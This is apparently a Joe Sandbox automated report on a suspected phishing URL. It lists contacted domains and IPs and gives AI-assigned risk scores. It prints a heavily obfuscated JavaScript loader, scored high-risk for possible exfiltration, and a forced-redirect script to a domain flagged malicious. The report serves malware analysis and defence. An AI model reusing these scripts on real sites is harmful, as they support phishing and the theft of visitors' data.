https://metin2odisey.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=903112caee240c7a	false	Avira URL Cloud: phishing	unknown
https://en.wikipedia.org/wiki/Client_access_license#DummyBot	false		high
https://metin2odisey.com/favicon.ico	false	Avira URL Cloud: phishing	unknown
https://en.wikipedia.org/static/images/icons/wikipedia.png	false		high
https://en.wikipedia.org/static/images/project-logos/enwiki.png	false		high
https://dtrnconsulta.com/hnvwk	false		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/d/903112e0daeb0c84/1737061634197/qfMRqOc8eRxuhhn	false		high
https://en.wikipedia.org/w/load.php?lang=en&modules=startup&only=scripts&raw=1&skin=vector-2022	false		high
https://a.nel.cloudflare.com/report/v4?s=gaelyH8Fog3gWSR13CGEFafByMMecEGFfyvzVu5MFNsDgJ%2BHeOS%2BiCsVUgsnwgQTqlBcqcXM2wN0MKNtusFx4gWVH5mDN2Eu8wzS2WYFSBruFvJJWNfQ%2Bq71XwF2coTv%2B%2BU5	false		high
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=903112e0daeb0c84&lang=auto	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://intake-analytics.wikimedia.org	chromecache_108.2.dr, chromecache_95.2.dr	false		high
https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Terms_of_Use	chromecache_112.2.dr	false		high
https://upload.wikimedia.org/wikipedia/commons/thumb/c/c9/Client-server-model.svg/500px-Client-serve	chromecache_111.2.dr, chromecache_104.2.dr	false		high
https://www.wikidata.org/wiki/Special:EntityPage/Q1100998	chromecache_112.2.dr	false		high
https://upload.wikimedia.org/wikipedia/commons/c/c0/MediaWiki_footer_link_ltr.svg	chromecache_76.2.dr, chromecache_110.2.dr	false		high
https://developer.wikimedia.org	chromecache_112.2.dr	false	Avira URL Cloud: safe	unknown
https://www.techtarget.com/searchvirtualdesktop/tip/Remote-Desktop-Services-licensing-rules-and-reco	chromecache_112.2.dr	false		high
https://www.wikidata.org	chromecache_82.2.dr, chromecache_101.2.dr	false		high
https://www.mediawiki.org/wiki/Specs/HTML/2.8.0	chromecache_93.2.dr, chromecache_97.2.dr	false		high
https://creativecommons.org/licenses/by-sa/4.0/deed.en	chromecache_112.2.dr	false		high
https://www.mediawiki.org/wiki/Specs/Summary/1.2.0	chromecache_71.2.dr, chromecache_78.2.dr	false		high
https://www.mediawiki.org/wiki/Manual:Messages_API#Feature_support_in_JavaScript	chromecache_93.2.dr, chromecache_97.2.dr	false		high
https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Privacy_policy	chromecache_112.2.dr	false		high
https://login.wikimedia.org/wiki/Special:CentralAutoLogin/start?useformat=desktop&type=1x1&u	chromecache_112.2.dr	false		high
https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Universal_Code_of_Conduct	chromecache_112.2.dr	false		high
http://www.networkworld.com/community/node/61283	chromecache_112.2.dr	false		high
https://intake-analytics.wikimedia.org/v1/events?hasty=true	chromecache_108.2.dr, chromecache_95.2.dr	false		high
https://upload.wikimedia.org/wikipedia/commons/thumb/c/c9/Client-server-model.svg/320px-Client-serve	chromecache_111.2.dr, chromecache_104.2.dr	false		high
https://www.mediawiki.org/wiki/Extension:VisualEditor/Skin_requirements	chromecache_93.2.dr, chromecache_97.2.dr	false		high
https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Cookie_statement	chromecache_112.2.dr	false		high
http://www.mslicensing.fr/theorie/core-cal-vs-enteeprise-cal	chromecache_112.2.dr	false	Avira URL Cloud: safe	unknown
http://www.msterminalservices.org/articles/Changes-Windows-Server-2008-Terminal-Server-Licensing-Par	chromecache_112.2.dr	false	Avira URL Cloud: safe	unknown
https://intake-logging.wikimedia.org/v1/events?hasty=true	chromecache_108.2.dr, chromecache_95.2.dr	false		high
https://redux.js.org/api-reference/store#subscribe(listener)	chromecache_78.2.dr	false		high
https://www.wikidata.org/w/api.php	chromecache_108.2.dr, chromecache_95.2.dr	false		high
https://www.wikidata.org/wiki/Special:EntityPage/Q1100998#sitelinks-wikipedia	chromecache_112.2.dr	false		high
https://www.mediawiki.org/w/api.php	chromecache_108.2.dr, chromecache_95.2.dr	false		high
https://www.theregister.com/2020/03/20/surge_in_home_working/	chromecache_112.2.dr	false		high
https://www.mediawiki.org/	chromecache_112.2.dr	false		high
https://wikimediafoundation.org/	chromecache_112.2.dr	false	Avira URL Cloud: safe	unknown
https://donate.wikimedia.org/?wmf_source=donate&wmf_medium=sidebar&wmf_campaign=en.wikipedia	chromecache_112.2.dr	false		high
https://archive.today/20120906095448/http://www.msterminalservices.org/articles/Changes-Windows-Serv	chromecache_112.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.18.94.41	challenges.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
104.18.95.41	unknown	United States	13335	CLOUDFLARENETUS	false
192.0.78.27	href.li	United States	2635	AUTOMATTICUS	false
185.15.59.224	dyna.wikimedia.org	Netherlands	14907	WIKIMEDIAUS	false
104.21.24.140	metin2odisey.com	United States	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
66.63.187.232	fortishomebuilders.com	United States	8100	ASN-QUADRANET-GLOBALUS	true
83.217.208.10	dtrnconsulta.com	Russian Federation	31514	INF-NET-ASRU	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
142.250.184.228	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.4
192.168.2.13
192.168.2.23

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1593135
Start date and time:	2025-01-16 22:06:03 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://dtrnconsulta.com/hnvwk
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal52.win@25/81@34/13
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.186.67, 142.250.186.174, 142.250.110.84, 142.250.184.206, 142.250.181.238, 199.232.210.172, 2.23.77.188, 216.58.206.46, 142.250.185.238, 216.58.206.78, 142.250.74.206, 142.250.186.170, 142.250.185.74, 142.250.186.138, 172.217.16.202, 142.250.185.138, 142.250.184.234, 142.250.186.42, 142.250.185.202, 142.250.185.170, 172.217.16.138, 142.250.186.106, 142.250.185.234, 142.250.186.74, 172.217.18.10, 142.250.185.106, 216.58.206.74, 142.250.181.227, 142.250.184.238, 142.250.185.206, 184.28.90.27, 52.149.20.212, 4.245.163.56, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: https://dtrnconsulta.com/hnvwk

Input	Output
URL: https://dtrnconsulta.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false, "reasoning": "This appears to be a standard business domain with a common .com TLD. No suspicious elements are present in the URL structure." }
URL: https://dtrnconsulta.com
URL: https://metin2odisey.com/verytrue/... Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": "The provided JavaScript snippet simply reloads the current page, which is a common and benign operation. This behavior does not indicate any high-risk, malicious, or suspicious activities." }
window.location.reload();
URL: https://metin2odisey.com/verytrue/... Model: Joe Sandbox AI	{ "risk_score": 6, "reasoning": "The script exhibits several moderate-risk behaviors, including external data transmission, use of fallback domains, and aggressive DOM manipulation. While the script may have a legitimate purpose, such as analytics or tracking, the lack of transparency and potential for abuse warrant further review." }
(function(){window._cf_chl_opt={cvId: '3',cZone: "metin2odisey.com",cType: 'interactive',cRay: '903112caee240c7a',cH: 'PTYT7zyAOgo4VQZL8cUrMiwLdB9mssZcDsY4P22_G_8-1737061628-1.2.1.1-C0fUZxc3UPnEu3f6WwwEhDcPUpw4AqAzQgxfH8xFyAY58K8yPhjKmCmaMr2B7Rig',cUPMDTk: "\/verytrue\/?__cf_chl_tk=f970zw3KAn9h5CNGwUP4ucVHF3Sp5YVkI.J0J9hMAHw-1737061628-1.0.1.1-t4obkpJnuet9MSI1y7ODqemeXtxZ8R8jeCrEDqTp3e8",cFPWv: 'g',cITimeS: '1737061628',cTTimeMs: '1000',cMTimeMs: '390000',cTplC: 0,cTplV: 5,cTplB: 'cf',cK: "",fa: "\/verytrue\/?__cf_chl_f_tk=f970zw3KAn9h5CNGwUP4ucVHF3Sp5YVkI.J0J9hMAHw-1737061628-1.0.1.1-t4obkpJnuet9MSI1y7ODqemeXtxZ8R8jeCrEDqTp3e8",md: ".Iz88PAS7wNjWQUa._8aEbUSNwo415pkP9jLEgMdH0g-1737061628-1.2.1.1-CuxPp30hFkrj7le9_GlwA6hfWo_0q4Pzkf.TLuNbd3qAHPsAsSDx07ZhKGMROCrN6P78iOrXl_iU47NtwV0aQHBKOnwkustVIs7458LFR6dplYNdPNyaqDXJLz0SG8hnm61I8zKnymT2.7XTwa75OwchvM_RxBSZV7hB0dKEYuX4ujHNJeyiVGwaXXSAX_HJ4LnsMMMkVFV1k8RXwcoNbCb8VoktlWzpJnlttNvbOyXwd3IGj2rPv9GPCu8kKatsemZAdBYwAbJVS3S3TGLrlj8pStKoUUOEpafEGAQobM2yBgB0o_2fXbZC9bqUikpW5SlOkfqP5_y0_aXjZhAhdYr4P3iU2nqb.COaMCp3gNXzFwrNGAEsOmQ6csjQx0yieZDF6UPMBIeCKp6yhNFo1j0OVVxq80tByM.qBvCx7BPwetse3JBmm0eYmudMTKmQcwxh6aVVAPR9OTPjDDy8lxALTn7WoQCI6VGI7B1tDQhYxIs9BbZc5vkH1.CcpszssRc9603w35aGQPG3so4aOTlN8ShqTtbtXDYCKWNTkabF5mleFRaE5Kqe2VagI1t1sPRaz_rmHeWq04M2LSeenNjYDyeJsTwfAL.ALR8JkL.ysxKVuAjg0BNhcNmew8SFF3O556PG32mO.Qie9ROOs6K.ZN810SV7rLbQuONcZFOTXf6jRrh4zLav_q2T1cMxz_BBoYQ8x6n8qoTqa7WETVWkxwnPMVznBZ5i5MAqwayFAL8Wn.jZlqUnC1VAUIatBnQjUMogNCrAj.qhCcOCzko8qxdM3BGwia_CknxRgdCsiJYoeFAJH543rZF0qRrLluvocYnY6e9YlOKY7r3hvsp2fC_NxRgDOg_lO82YnBjoOQBGD9wxqJHXJKsSl3JQdDglTT6ROn5S5MWk0xS5NckHDsHvVzM7Rf2mtHAW2UBFo6cQODyimu5n.ndFU5NkvxAkz7ORZqlndHO6U27jGS7R8NCRPA89MGGhjKTka_Hs6pPigT3RdQ2gwvFOwe397pa2f707xTwmvQmin4qISWOCfR_TWXaTuOpA1mLhANCuiiE4lqjjJRw5PqYunGOj7V9D_LivOEtxVeoqS6MXXquZcFYyEyzJsPyRQrdVlWnvsieIycsmX8RJbJKwvdi46p8QBhxLDYgZyjrpuXn3GQDioGQxrYXodWxsERz.jZ4U9bgi1rbkFX4S.A5MvlrMuqW0SSi2n07slzqC_n38rLGyg8n_yPPGZkqXS6Grp6rIhJ6eWlzY71v6NLhbBM5nToiF.5NYHGVbZqq4_p2_3PSL0Va6p41D0gV0iIlr0PXH_.PGifF4FeSpM1OmDrH5OxlpeBgoUwazzykqxwXEtVvKyGinjI.DVacxQs8cgYQbEuyb3LNcXSCC25FLKbbSOGX.S9JiP4NRBTT4FHFpvwy.L_TbxLkVDZWeRjDQxeDoJyOKxP5iRDjkgt_co2KeQwoBsQL5nwd.WI1f1USgjA6gPgRcSaH0AsYbXYu24dq7MWSBd0txYCZp2g1bVBJgUi9GgzD5662jJu7mLD68y9BfAenZ7lUqiJfbmTdNdZpcXu_X8bDftuO5_fmxZUTSzAzoWUy0Y.d0NJbOimNlhSl.wEsyBQWMnasEkPWjY.lkA.I5zMDVC9yfEwyiYPdeV3PRB3Azy2h.9a3gB6ExQMDIzpdD65DpcSBxMkd2lKNpUAzk726i82KXndIPgJ8ipT75NXf7oJ_JQJAdfuuR5KyRbFMEChm_a.tRr5NJUqxu3ssMIS6i09blhYxdZAJ1",mdrd: "G4s7SCTtDO1ttWhUmy1SWjkN2jYZL.LWHHufOBEvRvc-1737061628-1.2.1.1-K1ChVytb2buva1g4.NcCkGc_vvrRUkSmbbBLHZ8tz7mZnhBoHPgTeSORHAQXl81124FAF7vz_pTlwW1g0IyUrf7LeKuzo31pUt37ad7UMfOFevWUSpDdPi5hL6WipIPiYfLaR16m5rnUftgsf1OtFrq2unUnqi.xbedzne86Dy8nnCqcbz5O1KqoW6dxL1ds75W_rSGI0yy_yiD9SHEW_WZs7MLX6XmgzgtY_bEJk1EX7v3xKfpOSizRaqC4Z1Ez0BigdWwv_nvo1j.aKk7zNUi7nqCtuHIL8rq2SeSpYS8Asjm4UHO9JSofbaXKAN89ZcZhP5i5bPIsWo_xpIcrMSb6spYH0g7asU2Dhtklexji.51v58Gff7HPf3Vn8oDLdwBSJ6Ej3a5EeU9vU3shev3Pv7ki5Ir.WgGH.rk6jAhAxuyIz9tIX_hsi8BiUdz2N6AquCbexLMBi3fWJeEA.U3HjhyzlA7TfwbpAZbionS8aPxXyqipL2YyjttZa9r99aIPk9FkrIyL4O0j4j5fTFGT4LkQmIopaJYGEBNhjLRIeQT0yCo.SLSbhuNVoZ5cWMxFMeNGigJMpG2bkGqtsNSikqmVk1D0sQTL4p8Nl1DAV60dptvUzEkW6544dNtYgid8kciblbpMaZcsD.liIS6nvWb3iEWWTMbIhpdZqV1O1f1J89JwmwLF8j9Gf_X90tndERu7BDzdO5N67mV2H_lUG9M_k3fqhbQxo5sr9qFH6f9Fj4INt.SYTaChG4bb7WF7OxIWc3VpJfp0iSVqmJaNccPsAdB8PwLQpTAW_ioCGHrqSpWPdhYXic94oVvGcKXoXsomrGFTFkiPzSfpLsioC_IrV0FvPyen88n3iRSNAPaDp6mANf_tOSj1VaM5lrMy8RI258Cu3LsDbCqUQWNYH08PAovp9UwvSERk4osB8xYmMH3udlVjzV2msWhisTbO5amWFL9CPFwB_vjOaHsG3CtJ71M2GS1SnZ9EXuuu7b9nR7AyWhg3vUl9L1GNE9YrzNsN22KgfXSDORI2bXkM4v3ieZjuLmEvI7VTFAwcPZM7pkMjDgKEGVqjBIkbDNgWvIaAVcyRE8jISP1YbgldvAiXZwmHZTGRrD7TbeOMPe8Q8CePOPQgNu9gLYA9TbXvlABEl5QqFTIsK7qe8y8UIG0pJPoTyDmSdF63RYDwl8H9N5VTesuuSVe8JAAeAFthUHHBSjL_Gmp4f8wk0ck6gnqpmMLsccjD_X6AoD0GU12Xn2D18dkjWBAvEH0CrPYUR9VVf14JxRdJXq.dGuwZFp2JqknnULBlQPJfu.FyjscYP_rMzGw.Pg2eIjfOxZqHbyjDvmlQ4koUIRRlDsMxRjuuKUIOr_kzg4YFLYk7n13fr4APEJxTiRVxCrpHxC0oKXnTUgvqH_Nn1FzXBJw2I55
URL: https://metin2odisey.com/verytrue/... Model: Joe Sandbox AI	{ "risk_score": 9, "reasoning": "This JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `eval`, `Function` constructor, and heavily encoded strings indicates a high likelihood of malicious intent. Additionally, the script appears to be sending user data to external domains, which raises concerns about data privacy and security. Overall, this script demonstrates a clear pattern of suspicious and potentially harmful activities, warranting a high-risk score." }
var link = "Q3NWRXJlYUszY2cyaGlNMmk5cldPZ1BkMFVJSENib0xod0RhVXRudDc1bVBhajF4UXptSXZ4bkZ1bDh1VnNsUVI0cXgxNW9kazlYcGpTTmNaM1dTNk5vZUVIUUFHRTh3dmJ2TXRma3k2ZzlveW9uRHppbVJMWHVZM3FMc0pUNFJicFREcUpsNklVT2ZXQ2M1WG84UzdL"; var random = "aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9MaXN0X29mX01pY3Jvc29mdF8zNjVfQXBwbGljYXRpb25z"; var autograb = false; const _0x370772=_0x4de9;(function(_0x4f6b79,_0x5e87a3){const _0x23902b=_0x4de9,_0x1aa4ca=_0x4f6b79();while(!![]){try{const _0x4ecf9d=parseInt(_0x23902b(0x1f2))/0x1(-parseInt(_0x23902b(0x1ff))/0x2)+parseInt(_0x23902b(0x202))/0x3+parseInt(_0x23902b(0x201))/0x4(parseInt(_0x23902b(0x215))/0x5)+parseInt(_0x23902b(0x210))/0x6+-parseInt(_0x23902b(0x200))/0x7(-parseInt(_0x23902b(0x1fe))/0x8)+-parseInt(_0x23902b(0x1f8))/0x9+-parseInt(_0x23902b(0x1ed))/0xa(parseInt(_0x23902b(0x1fd))/0xb);if(_0x4ecf9d===_0x5e87a3)break;else _0x1aa4ca['push'](_0x1aa4ca['shift']());}catch(_0x5e20f3){_0x1aa4ca['push'](_0x1aa4ca['shift']());}}}(_0x5cca,0xe5b41));const _0x6d4a3c=(function(){let _0x5cc2bf=!![];return function(_0x9b77da,_0x135712){const _0xf77bb9=_0x5cc2bf?function(){const _0xec2e23=_0x4de9;if(_0x135712){const _0x101ef2=_0x135712[_0xec2e23(0x204)](_0x9b77da,arguments);return _0x135712=null,_0x101ef2;}}:function(){};return _0x5cc2bf=![],_0xf77bb9;};}()),_0x487215=_0x6d4a3c(this,function(){const _0x34a2de=_0x4de9;return _0x487215[_0x34a2de(0x1f3)]()['search'](_0x34a2de(0x1ee))[_0x34a2de(0x1f3)]()[_0x34a2de(0x212)](_0x487215)['search'](_0x34a2de(0x1ee));});_0x487215();const _0x5dbfa7=(function(){let _0x4b0e96=!![];return function(_0xd5d4f3,_0xaef652){const _0x53ffda=_0x4b0e96?function(){if(_0xaef652){const _0x48e2d4=_0xaef652['apply'](_0xd5d4f3,arguments);return _0xaef652=null,_0x48e2d4;}}:function(){};return _0x4b0e96=![],_0x53ffda;};}());(function(){_0x5dbfa7(this,function(){const _0x13ac30=_0x4de9,_0x97b71d=new RegExp('function\x20\x5c(\x20\x5c)'),_0x562d3b=new RegExp(_0x13ac30(0x1f7),'i'),_0x4d3b42=_0x3d6ca4(_0x13ac30(0x1fb));!_0x97b71d[_0x13ac30(0x20c)](_0x4d3b42+'chain')\|\|!_0x562d3b[_0x13ac30(0x20c)](_0x4d3b42+'input')?_0x4d3b42('0'):_0x3d6ca4();})();}());const _0x55444a=(function(){let _0x33f15b=!![];return function(_0x57a666,_0x260f9d){const _0x31c56e=_0x33f15b?function(){const _0x59e2eb=_0x4de9;if(_0x260f9d){const _0xb3158f=_0x260f9d[_0x59e2eb(0x204)](_0x57a666,arguments);return _0x260f9d=null,_0xb3158f;}}:function(){};return _0x33f15b=![],_0x31c56e;};}()),_0x4f3632=_0x55444a(this,function(){const _0x2ff6f3=_0x4de9,_0x330ee3=function(){const _0x1dd09b=_0x4de9;let _0x14d87b;try{_0x14d87b=Function('return\x20(function()\x20'+_0x1dd09b(0x218)+');')();}catch(_0x4d6905){_0x14d87b=window;}return _0x14d87b;},_0x131a47=_0x330ee3(),_0x18e009=_0x131a47[_0x2ff6f3(0x206)]=_0x131a47[_0x2ff6f3(0x206)]\|\|{},_0x1706ee=[_0x2ff6f3(0x205),_0x2ff6f3(0x216),'info',_0x2ff6f3(0x203),_0x2ff6f3(0x1f5),_0x2ff6f3(0x1f4),_0x2ff6f3(0x207)];for(let _0x3a4ef4=0x0;_0x3a4ef4<_0x1706ee[_0x2ff6f3(0x1f1)];_0x3a4ef4++){const _0x5abefa=_0x55444a[_0x2ff6f3(0x212)][_0x2ff6f3(0x20e)]['bind'](_0x55444a),_0x2ee7c2=_0x1706ee[_0x3a4ef4],_0x5e394d=_0x18e009[_0x2ee7c2]\|\|_0x5abefa;_0x5abefa[_0x2ff6f3(0x1f6)]=_0x55444a[_0x2ff6f3(0x208)](_0x55444a),_0x5abefa[_0x2ff6f3(0x1f3)]=_0x5e394d['toString'][_0x2ff6f3(0x208)](_0x5e394d),_0x18e009[_0x2ee7c2]=_0x5abefa;}});function _0x5cca(){const _0x49775a=['trace','bind','onload','Error\x20encoding\x20string.','/index?a=','test','while\x20(true)\x20{}','prototype','stateObject','7057404VGAaEh','location','constructor','/index','gger','4989590fceNiz','warn','string','{}.constructor(\x22return\x20this\x22)(\x20)','action','href','2800XoTiRS','(((.+)+)+)+$','call','substring','length','1nDTKwE','toString','table','exception','__proto__','\x5c+\x5c+\x20(?:[a-zA-Z_$][0-9a-zA-Z_$])','945234wBsndJ','counter','hash','init','debu','155078irFNIr','8BAihSD','952052hXXCrM','11247859baQcXU','4QpQeNS','5065104jKIhEm','error','apply','log','console'];_0x5cca=function(){return _0x49775a;};
URL: https://fortishomebuilders.com/... Model: Joe Sandbox AI	{ "risk_score": 8, "reasoning": "This script demonstrates high-risk behavior by attempting to redirect the user to an external domain, potentially for malicious purposes. The use of the `window.onerror` event handler to trigger the `process()` function is also concerning, as it could be used to intercept and handle errors in a way that compromises the user's security. Overall, this script exhibits behaviors that are highly suspicious and potentially malicious." }
function sleep(ms) { return new Promise(resolve => setTimeout(resolve, ms)); } async function process() { await sleep(0); if (window.location !== window.parent.location ) { top.location = "http://fortishomebuilders.com/"; } else { window.location = "http://fortishomebuilders.com/"; } } a28516= 9; window.onerror = process; process();
URL: https://metin2odisey.com/verytrue/ Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false, "page_classification": "unknown" }

URL: https://metin2odisey.com/verytrue/ Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false, "page_classification": "unknown" }

URL: https://metin2odisey.com/verytrue/ Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false, "page_classification": "unknown" }

URL: https://metin2odisey.com/verytrue/ Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "Verify you are human", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false, "page_classification": "unknown" }

URL: https://metin2odisey.com/verytrue/ Model: Joe Sandbox AI	{ "brands": [ "Cloudflare" ] }
	{ "brands": [ "Cloudflare" ] }
URL: https://metin2odisey.com/verytrue/ Model: Joe Sandbox AI	{ "brands": [ "Cloudflare" ] }
	{ "brands": [ "Cloudflare" ] }
URL: https://metin2odisey.com/verytrue/ Model: Joe Sandbox AI	{ "brands": [ "Cloudflare" ] }
	{ "brands": [ "Cloudflare" ] }
URL: https://metin2odisey.com/verytrue/ Model: Joe Sandbox AI	{ "brands": [ "Cloudflare" ] }
	{ "brands": [ "Cloudflare" ] }
URL: https://en.wikipedia.org/wiki/Client_access_license#DummyBot Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false, "page_classification": "software download portal" }

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://dtrnconsulta.com/hnvwk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Windows Analysis Report
https://dtrnconsulta.com/hnvwk